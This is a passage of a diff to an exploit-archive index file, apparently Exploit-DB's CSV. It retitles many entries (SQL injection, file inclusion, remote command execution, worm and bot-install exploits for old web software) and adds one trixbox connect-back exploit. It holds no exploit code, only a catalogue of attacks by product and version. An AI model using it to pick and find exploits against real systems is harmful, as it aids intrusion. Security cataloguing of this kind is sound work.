40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0 @@ -15837,7 +15846,7 @@ id,file,description,date,author,platform,type,port 41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remote Type Confusion",2017-05-09,"Google Security Research",windows,remote,0 41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0 41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",python,remote,80 -41992,platforms/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0 +41992,platforms/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0 41996,platforms/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote,0 42010,platforms/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,linux,remote,0 42011,platforms/windows/remote/42011.py,"LabF nfsAxe 3.7 FTP Client - Buffer Overflow (SEH)",2017-05-15,Tulpa,windows,remote,0 @@ -16621,10 +16630,10 @@ id,file,description,date,author,platform,type,port 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 -53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote",2003-07-10,knight420,cgi,webapps,0 +53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution",2003-07-10,knight420,cgi,webapps,0 38772,platforms/hardware/webapps/38772.txt,"ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,80 -137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - 'search_id' SQL Injection MD5 Hash Remote",2003-12-21,RusH,php,webapps,0 -138,platforms/php/webapps/138.pl,"PHP-Nuke 6.9 - 'cid' SQL Injection Remote",2003-12-21,RusH,php,webapps,0 +137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - 'search_id' SQL Injection / MD5 Hash",2003-12-21,RusH,php,webapps,0 +138,platforms/php/webapps/138.pl,"PHP-Nuke 6.9 - 'cid' SQL Injection",2003-12-21,RusH,php,webapps,0 177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - Multiple Vulnerabilities",2000-11-15,keelis,cgi,webapps,0 179,platforms/cgi/webapps/179.c,"News Update 1.1 - Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0 187,platforms/cgi/webapps/187.pl,"ListMail 112 - Command Execution",2000-11-17,teleh0r,cgi,webapps,0 @@ -16634,7 +16643,7 @@ id,file,description,date,author,platform,type,port 309,platforms/php/webapps/309.c,"phpMyAdmin 2.5.7 - Remote code Injection",2004-07-04,"Nasir Simbolon",php,webapps,0 384,platforms/php/webapps/384.txt,"PHP 4.3.7 - 'php-exec-dir' Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0 406,platforms/php/webapps/406.pl,"phpMyWebhosting - SQL Injection",2004-08-20,"Noam Rathaus",php,webapps,0 -407,platforms/cgi/webapps/407.txt,"AWStats 5.0 < 6.3 - Input Validation Hole in 'logfile'",2004-08-21,"Johnathan Bat",cgi,webapps,0 +407,platforms/cgi/webapps/407.txt,"AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution",2004-08-21,"Johnathan Bat",cgi,webapps,0 430,platforms/php/webapps/430.txt,"TorrentTrader 1.0 RC2 - SQL Injection",2004-09-01,aCiDBiTS,php,webapps,0 436,platforms/php/webapps/436.txt,"PHP-Nuke 7.4 - Privilege Escalation",2004-09-08,mantra,php,webapps,0 464,platforms/cgi/webapps/464.txt,"Turbo Seek - Null Byte Error Discloses Files",2004-09-13,durito,cgi,webapps,0 @@ -16653,21 +16662,21 @@ id,file,description,date,author,platform,type,port 659,platforms/cgi/webapps/659.txt,"Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal",2004-11-25,"Zero X",cgi,webapps,0 673,platforms/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0 676,platforms/php/webapps/676.c,"phpBB 1.0.0/2.0.10 - 'admin_cash.php' Remote Code Execution",2004-12-05,evilrabbi,php,webapps,0 -697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote",2004-12-17,overdose,php,webapps,0 -702,platforms/php/webapps/702.pl,"phpBB - highlight Arbitrary File Upload 'Santy.A'",2004-12-22,anonymous,php,webapps,0 +697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Information Leak",2004-12-17,overdose,php,webapps,0 +702,platforms/php/webapps/702.pl,"phpBB < 2.0.10 - 'Santy.A Worm' 'highlight' Arbitrary File Upload",2004-12-22,anonymous,php,webapps,0 703,platforms/php/webapps/703.pl,"phpMyChat 0.14.5 - Remote Improper File Permissions",2004-12-22,sysbug,php,webapps,0 -704,platforms/php/webapps/704.pl,"e107 - 'include()' Remote",2004-12-22,sysbug,php,webapps,80 +704,platforms/php/webapps/704.pl,"e107 - 'include()' Remote File Upload",2004-12-22,sysbug,php,webapps,80 720,platforms/php/webapps/720.pl,"Sanity.b - phpBB 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,anonymous,php,webapps,0 725,platforms/php/webapps/725.pl,"PHPInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,anonymous,php,webapps,0 737,platforms/php/webapps/737.txt,"QwikiWiki - Directory Traversal",2005-01-04,Madelman,php,webapps,0 -740,platforms/php/webapps/740.pl,"phpBB 2.0.10 - Bot Install Altavista 'ssh.D.Worm'",2005-01-04,"Severino Honorato",php,webapps,0 +740,platforms/php/webapps/740.pl,"phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista",2005-01-04,"Severino Honorato",php,webapps,0 754,platforms/php/webapps/754.pl,"ITA Forum 1.49 - SQL Injection",2005-01-13,RusH,php,webapps,0 772,platforms/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (C)",2005-01-25,THUNDER,cgi,webapps,0 773,platforms/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl)",2005-01-25,GHC,cgi,webapps,0 774,platforms/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition",2005-01-25,"Noam Rathaus",php,webapps,0 786,platforms/php/webapps/786.pl,"LiteForum 2.1.1 - SQL Injection",2005-02-04,RusH,php,webapps,0 790,platforms/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,cgi,webapps,0 -800,platforms/php/webapps/800.txt,"PostNuke PostWrap Module - Remote",2005-02-08,"ALBANIA SECURITY",php,webapps,0 +800,platforms/php/webapps/800.txt,"PostNuke PostWrap Module - Remote File Inclusion / Code Execution",2005-02-08,"ALBANIA SECURITY",php,webapps,0 801,platforms/php/webapps/801.c,"PHP-Nuke 7.4 - Admin",2005-02-09,Silentium,php,webapps,0 807,platforms/php/webapps/807.txt,"MyPHP Forum 1.0 - SQL Injection",2005-02-10,GHC,php,webapps,0 808,platforms/php/webapps/808.txt,"CMScore - SQL Injection",2005-02-10,GHC,php,webapps,0 @@ -16694,8 +16703,8 @@ id,file,description,date,author,platform,type,port 892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass",2005-03-21,kre0n,php,webapps,0 897,platforms/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,php,webapps,0 901,platforms/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass",2005-03-29,RusH,php,webapps,0 -907,platforms/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Remote",2005-04-02,CereBrums,php,webapps,0 -910,platforms/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Remote",2005-04-04,CereBrums,php,webapps,0 +907,platforms/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Get Hash",2005-04-02,CereBrums,php,webapps,0 +910,platforms/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Get Hash",2005-04-04,CereBrums,php,webapps,0 921,platforms/php/webapps/921.sh,"PHP-Nuke 6.x < 7.6 Top module - SQL Injection",2005-04-07,"Fabrizi Andrea",php,webapps,0 922,platforms/cgi/webapps/922.pl,"The Includer CGI 1.0 - Remote Command Execution (2)",2005-04-08,GreenwooD,cgi,webapps,0 30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0 @@ -16706,7 +16715,7 @@ id,file,description,date,author,platform,type,port 954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - 'index.cgi' Remote Command Execution",2005-04-25,z,cgi,webapps,0 980,platforms/cgi/webapps/980.pl,"I-Mall Commerce - 'i-mall.cgi' Remote Command Execution",2005-05-04,"Jerome Athias",cgi,webapps,0 982,platforms/php/webapps/982.c,"ZeroBoard - Worm Source Code",2005-05-06,anonymous,php,webapps,0 -989,platforms/php/webapps/989.pl,"PhotoPost - Arbitrary Data Remote",2005-05-13,basher13,php,webapps,0 +989,platforms/php/webapps/989.pl,"PhotoPost - Arbitrary Data Hash",2005-05-13,basher13,php,webapps,0 996,platforms/php/webapps/996.pl,"ZPanel 2.5b10 - SQL Injection",2005-05-17,RusH,php,webapps,0 1003,platforms/php/webapps/1003.c,"Fusion SBX 1.2 - Remote Command Execution",2005-05-20,Silentium,php,webapps,0 1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution (2)",2005-05-20,Nikyt0x,cgi,webapps,0 @@ -16731,8 +16740,8 @@ id,file,description,date,author,platform,type,port 1039,platforms/cgi/webapps/1039.pl,"Webhints 1.03 - Remote Command Execution (Perl) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0 1040,platforms/cgi/webapps/1040.c,"Webhints 1.03 - Remote Command Execution (C) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0 1041,platforms/cgi/webapps/1041.pl,"Webhints 1.03 - Remote Command Execution (Perl) (3)",2005-06-11,MadSheep,cgi,webapps,0 -1048,platforms/cgi/webapps/1048.pl,"eXtropia Shopping Cart - 'web_store.cgi' Remote",2005-06-15,"Action Spider",cgi,webapps,0 -1049,platforms/php/webapps/1049.php,"Mambo 4.5.2.1 - Fetch Password Hash Remote",2005-06-15,pokleyzz,php,webapps,0 +1048,platforms/cgi/webapps/1048.pl,"eXtropia Shopping Cart - 'web_store.cgi' Remote Command Execution",2005-06-15,"Action Spider",cgi,webapps,0 +1049,platforms/php/webapps/1049.php,"Mambo 4.5.2.1 - Fetch Password Hash",2005-06-15,pokleyzz,php,webapps,0 1050,platforms/php/webapps/1050.pl,"PHP Arena 1.1.3 - 'pafiledb.php' Remote Change Password",2005-06-15,Alpha_Programmer,php,webapps,0 1051,platforms/php/webapps/1051.pl,"Ultimate PHP Board 1.9.6 GOLD - users.dat Password Decryptor",2005-06-16,"Alberto Trivero",php,webapps,0 1052,platforms/php/webapps/1052.php,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (1)",2005-06-17,mh_p0rtal,php,webapps,0 @@ -16823,7 +16832,7 @@ id,file,description,date,author,platform,type,port 1364,platforms/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,php,webapps,0 1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution",2005-12-10,rgod,php,webapps,0 1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,php,webapps,0 -1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Overwrite Remote",2005-12-14,rgod,php,webapps,0 +1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Remote Command Execution",2005-12-14,rgod,php,webapps,0 1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Remote Code Execution",2005-12-20,rgod,php,webapps,0 1382,platforms/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Brute Force/Dictionary (2)",2006-02-20,DarkFig,php,webapps,0 1383,platforms/php/webapps/1383.txt,"phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure",2005-12-21,jet,php,webapps,0 @@ -16887,7 +16896,7 @@ id,file,description,date,author,platform,type,port 1539,platforms/php/webapps/1539.txt,"MyBulletinBoard (MyBB) 1.03 - 'misc.php' SQL Injection",2006-02-28,Devil-00,php,webapps,0 1541,platforms/php/webapps/1541.pl,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution",2006-03-01,str0ke,php,webapps,0 1542,platforms/php/webapps/1542.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)",2006-03-01,LorD,php,webapps,0 -1543,platforms/php/webapps/1543.pl,"vuBB 0.2 - 'cookie' Final SQL Injection 'mq=off'",2006-03-01,KingOfSka,php,webapps,0 +1543,platforms/php/webapps/1543.pl,"vuBB 0.2 Final - 'cookie' SQL Injection",2006-03-01,KingOfSka,php,webapps,0 1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x - Datenbank MOD 'fileid' SQL Injection",2006-03-01,nukedx,php,webapps,0 1546,platforms/php/webapps/1546.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0 1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection",2006-03-02,lorenzo,php,webapps,0 @@ -16903,7 +16912,7 @@ id,file,description,date,author,platform,type,port 1567,platforms/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,php,webapps,0 1569,platforms/asp/webapps/1569.pl,"d2kBlog 1.0.3 - 'memName' SQL Injection",2006-03-09,DevilBox,asp,webapps,0 1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x - 'date' Remote Code Execution",2006-03-09,Hessam-x,php,webapps,0 -1571,platforms/asp/webapps/1571.html,"JiRos Banner Experience 1.0 - Create Authentication Bypass Remote",2006-03-09,nukedx,asp,webapps,0 +1571,platforms/asp/webapps/1571.html,"JiRos Banner Experience 1.0 - Unauthorised Create Admin",2006-03-09,nukedx,asp,webapps,0 1575,platforms/php/webapps/1575.pl,"Guestbook Script 1.7 - 'include_files' Remote Code Execution",2006-03-11,rgod,php,webapps,0 1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Nomenumbra,php,webapps,0 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,php,webapps,0 @@ -17017,14 +17026,14 @@ id,file,description,date,author,platform,type,port 1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion",2006-05-11,rgod,php,webapps,0 1778,platforms/php/webapps/1778.txt,"Foing 0.7.0 - 'phpBB' Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0 1779,platforms/php/webapps/1779.txt,"PHP Blue Dragon CMS 2.9 - Remote File Inclusion",2006-05-12,Kacper,php,webapps,0 -1780,platforms/php/webapps/1780.php,"phpBB 2.0.20 - Admin/Restore DB/default_lang Remote",2006-05-13,rgod,php,webapps,0 -1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - 'OptimisticLock' Remote",2006-05-14,rgod,php,webapps,0 +1780,platforms/php/webapps/1780.php,"phpBB 2.0.20 - Admin/Restore DB/default_lang Remote Command Execution",2006-05-13,rgod,php,webapps,0 +1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - 'OptimisticLock' Command Execution",2006-05-14,rgod,php,webapps,0 1789,platforms/php/webapps/1789.txt,"TR Newsportal 0.36tr1 - 'poll.php' Remote File Inclusion",2006-05-15,Kacper,php,webapps,0 1790,platforms/php/webapps/1790.txt,"Squirrelcart 2.2.0 - 'cart_content.php' Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 1793,platforms/php/webapps/1793.pl,"DeluxeBB 1.06 - 'name' SQL Injection (mq=off)",2006-05-15,KingOfSka,php,webapps,0 1795,platforms/php/webapps/1795.txt,"ezusermanager 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 1796,platforms/php/webapps/1796.php,"PHP-Fusion 6.00.306 - 'srch_where' SQL Injection",2006-05-16,rgod,php,webapps,0 -1797,platforms/php/webapps/1797.php,"DeluxeBB 1.06 - 'Attachment mod_mime' Remote",2006-05-16,rgod,php,webapps,0 +1797,platforms/php/webapps/1797.php,"DeluxeBB 1.06 - 'Attachment mod_mime' Remote Command Execution",2006-05-16,rgod,php,webapps,0 1798,platforms/php/webapps/1798.txt,"Quezza BB 1.0 - 'quezza_root_path' File Inclusion",2006-05-17,nukedx,php,webapps,0 1800,platforms/php/webapps/1800.txt,"ScozNews 1.2.1 - 'mainpath' Remote File Inclusion",2006-05-17,Kacper,php,webapps,0 1804,platforms/php/webapps/1804.txt,"phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass",2006-05-19,[Oo],php,webapps,0 @@ -17039,7 +17048,7 @@ id,file,description,date,author,platform,type,port 1816,platforms/php/webapps/1816.php,"Nucleus CMS 3.22 - 'DIR_LIBS' Remote File Inclusion",2006-05-23,rgod,php,webapps,0 1817,platforms/php/webapps/1817.txt,"Docebo 3.0.3 - Multiple Remote File Inclusions",2006-05-23,Kacper,php,webapps,0 1818,platforms/php/webapps/1818.txt,"phpCommunityCalendar 4.0.3 - Cross-Site Scripting / SQL Injection",2006-05-23,X0r_1,php,webapps,0 -1821,platforms/php/webapps/1821.php,"Drupal 4.7 - 'Attachment mod_mime' Remote",2006-05-24,rgod,php,webapps,0 +1821,platforms/php/webapps/1821.php,"Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution",2006-05-24,rgod,php,webapps,0 1823,platforms/php/webapps/1823.txt,"BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion",2006-05-25,str0ke,php,webapps,0 1824,platforms/php/webapps/1824.txt,"open-medium.CMS 0.25 - '404.php' Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 1825,platforms/php/webapps/1825.txt,"Back-End CMS 0.7.2.2 - 'BE_config.php' Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 @@ -17328,13 +17337,13 @@ id,file,description,date,author,platform,type,port 2228,platforms/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",asp,webapps,0 2229,platforms/php/webapps/2229.txt,"Shadows Rising RPG 0.0.5b - Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 2230,platforms/asp/webapps/2230.txt,"LBlog 1.05 - 'comments.asp' SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 -2231,platforms/php/webapps/2231.php,"Simple Machines Forum (SMF) 1.1 rc2 (Windows) - 'lngfile' Remote",2006-08-20,rgod,php,webapps,0 +2231,platforms/php/webapps/2231.php,"Simple Machines Forum (SMF) 1.1 rc2 (Windows) - 'lngfile' Local File Inclusion",2006-08-20,rgod,php,webapps,0 2232,platforms/php/webapps/2232.pl,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)",2006-08-20,ASIANEAGLE,php,webapps,0 2235,platforms/php/webapps/2235.txt,"PHProjekt 6.1 - 'path_pre' Multiple Remote File Inclusions",2006-08-21,"the master",php,webapps,0 2236,platforms/php/webapps/2236.txt,"PHlyMail Lite 3.4.4 - 'folderprops.php' Remote File Inclusion (2)",2006-08-21,Kw3[R]Ln,php,webapps,0 2239,platforms/php/webapps/2239.txt,"Empire CMS 3.7 - 'checklevel.php' Remote File Inclusion",2006-08-22,"Bob Linuson",php,webapps,0 2240,platforms/php/webapps/2240.txt,"HPE 1.0 - HPEinc Remote File Inclusion (2)",2006-08-22,"the master",php,webapps,0 -2243,platforms/php/webapps/2243.php,"Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics Remote",2006-08-22,rgod,php,webapps,0 +2243,platforms/php/webapps/2243.php,"Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics",2006-08-22,rgod,php,webapps,0 2247,platforms/php/webapps/2247.php,"MercuryBoard 1.1.4 - 'User-Agent' SQL Injection",2006-08-23,rgod,php,webapps,0 2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod 1.5.0 - 'start' SQL Injection",2006-08-23,SpiderZ,php,webapps,0 2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - 'lvc_include_dir' Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps,0 @@ -17369,7 +17378,7 @@ id,file,description,date,author,platform,type,port 2288,platforms/php/webapps/2288.php,"TikiWiki 1.9 Sirius - 'jhot.php' Remote Command Execution",2006-09-02,rgod,php,webapps,0 2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection",2006-09-02,DarkFig,php,webapps,0 2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - 'x_admindir' Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0 -2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - 'Zend_Hash_Del_Key_Or_Index' Remote",2006-09-03,rgod,php,webapps,0 +2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - 'Zend_Hash_Del_Key_Or_Index' Remote Command Execution",2006-09-03,rgod,php,webapps,0 2292,platforms/php/webapps/2292.txt,"Yappa-ng 2.3.1 - 'admin_modules' Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0 2293,platforms/php/webapps/2293.txt,"FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion",2006-09-04,NeXtMaN,php,webapps,0 2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - 'tr' SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0 @@ -17416,7 +17425,7 @@ id,file,description,date,author,platform,type,port 2344,platforms/php/webapps/2344.txt,"OPENi-CMS 1.0.1beta - 'config' Remote File Inclusion",2006-09-11,basher13,php,webapps,0 2346,platforms/php/webapps/2346.txt,"WTools 0.0.1a - 'INCLUDE_PATH' Remote File Inclusion",2006-09-11,ddoshomo,php,webapps,0 2347,platforms/php/webapps/2347.txt,"PhpLinkExchange 1.0 - Include / Cross-Site Scripting",2006-09-11,s3rv3r_hack3r,php,webapps,0 -2348,platforms/php/webapps/2348.pl,"phpBB 2.0.21 - Poison Null Byte Remote",2006-09-11,ShAnKaR,php,webapps,0 +2348,platforms/php/webapps/2348.pl,"phpBB 2.0.21 - Poison Null Byte Remote File Upload",2006-09-11,ShAnKaR,php,webapps,0 2349,platforms/php/webapps/2349.txt,"phpBB XS 0.58 - 'functions.php' Remote File Inclusion",2006-09-12,AzzCoder,php,webapps,0 2350,platforms/php/webapps/2350.txt,"p4CMS 1.05 - 'abs_pfad' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2351,platforms/php/webapps/2351.txt,"Popper 1.41-r2 - 'form' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 @@ -18204,7 +18213,7 @@ id,file,description,date,author,platform,type,port 3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 - 'kommentare.php' SQL Injection",2007-03-16,"Mehmet Ince",php,webapps,0 3500,platforms/php/webapps/3500.html,"Particle Blogger 1.2.0 - 'post.php?postid' SQL Injection",2007-03-16,WiLdBoY,php,webapps,0 3501,platforms/php/webapps/3501.txt,"PHP DB Designer 1.02 - Remote File Inclusion",2007-03-16,GoLd_M,php,webapps,0 -3502,platforms/php/webapps/3502.php,"PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Admin 2 'exec()'",2007-03-17,rgod,php,webapps,0 +3502,platforms/php/webapps/3502.php,"PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Command Execution",2007-03-17,rgod,php,webapps,0 3503,platforms/php/webapps/3503.txt,"MPM Chat 2.5 - 'view.php?logi' Local File Inclusion",2007-03-17,GoLd_M,php,webapps,0 3504,platforms/php/webapps/3504.pl,"Active PHP Bookmark Notes 0.2.5 - Remote File Inclusion",2007-03-17,GoLd_M,php,webapps,0 3505,platforms/php/webapps/3505.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (1)",2007-03-18,DarkFig,php,webapps,0 @@ -18240,7 +18249,7 @@ id,file,description,date,author,platform,type,port 3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - 'catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 - 'buyersend.asp?catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - 'default.asp?catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 -3552,platforms/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure Remote",2007-03-23,GoLd_M,php,webapps,0 +3552,platforms/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure",2007-03-23,GoLd_M,php,webapps,0 3556,platforms/asp/webapps/3556.html,"Active NewsLetter 4.3 - 'ViewNewspapers.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 3558,platforms/asp/webapps/3558.html,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 @@ -19131,7 +19140,7 @@ id,file,description,date,author,platform,type,port 4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - 'Filename' File Disclosure",2008-01-21,MhZ91,php,webapps,0 4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusions",2008-01-21,QTRinux,php,webapps,0 4956,platforms/php/webapps/4956.txt,"Alstrasoft Forum Pay Per Post Exchange 2.0 - SQL Injection",2008-01-21,t0pP8uZz,php,webapps,0 -4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x - 'MOIND_ID' Cookie Bug Remote",2008-01-21,nonroot,php,webapps,0 +4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x - 'MOIND_ID' Cookie Login Bypass",2008-01-21,nonroot,php,webapps,0 4958,platforms/php/webapps/4958.txt,"aflog 1.01 - Cross-Site Scripting / SQL Injection",2008-01-22,shinmai,php,webapps,0 4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' SQL Injection",2008-01-22,S@BUN,php,webapps,0 4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0 @@ -19977,6 +19986,7 @@ id,file,description,date,author,platform,type,port 6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin",2008-07-08,"CWH Underground",php,webapps,0 6024,platforms/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 - Multiple Remote File Inclusions",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6025,platforms/php/webapps/6025.txt,"Joomla! Component Content 1.0.0 - 'itemID' SQL Injection",2008-07-08,unknown_styler,php,webapps,0 +6026,platforms/linux/webapps/6026.pl,"Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,webapps,80 6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script 4.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - 'sIncPath' Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6033,platforms/php/webapps/6033.pl,"AuraCMS 2.2.2 - '/pages_data.php' Arbitrary Edit/Add/Delete",2008-07-09,k1tk4t,php,webapps,0 @@ -20115,7 +20125,7 @@ id,file,description,date,author,platform,type,port 6207,platforms/php/webapps/6207.txt,"LiteNews 0.1 - 'id' SQL Injection",2008-08-05,Stack,php,webapps,0 6208,platforms/php/webapps/6208.txt,"Wsn (Multiple Products) - Local File Inclusion / Code Execution",2008-08-06,otmorozok428,php,webapps,0 6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution",2008-08-06,PoMdaPiMp,php,webapps,0 -6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings Remote",2008-08-06,PoMdaPiMp,php,webapps,0 +6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings",2008-08-06,PoMdaPiMp,php,webapps,0 6211,platforms/php/webapps/6211.txt,"Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting",2008-08-06,CraCkEr,php,webapps,0 